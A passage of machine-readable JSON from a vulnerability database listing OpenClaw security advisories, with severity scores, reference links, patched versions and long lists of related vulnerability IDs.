S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35650","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1
","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35650"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization"},{"reference_url":"https://github.com/advisories/GHSA-39pp-xp36-q6mg","reference_id":"GHSA-39pp-xp36-q6mg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39pp-xp36-q6mg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerabi
lity":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerabi
lity":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerabi
lity":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerabi
lity":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerabi
lity":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35650","GHSA-39pp-xp36-q6mg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h9g5-xe4k-6udx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89343?format=json","vulnerability_id":"VCID-haxd-ps1x-h3ch","summary":"OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable\n## Impact\n\nStrict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.\n\nStrict browser SSRF checks could miss Playwright request-time navigation to private targets.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.3.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42430","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10088","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10118","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10102","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42430"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"u
rl":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42430","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42430"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERA
TE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling"},{"reference_url":"https://github.com/advisories/GHSA-w8g9-x8gx-crmm","reference_id":"GHSA-w8g9-x8gx-crmm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w8g9-x8gx-crmm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerabil
ity":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42430","GHSA-w8g9-x8gx-crmm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-haxd-ps1x-h3ch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89349?format=json","vulnerability_id":"VCID-hd4w-s3dp-nubj","summary":"OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n## Summary\nOpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full 
symlink-free upload and download hardening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n- `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41397","reference_id":"","reference_type":"","scores":[{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.2259","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22636","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00075","scoring_system":"epss","scoring_elements":"0.22651","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41397"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value
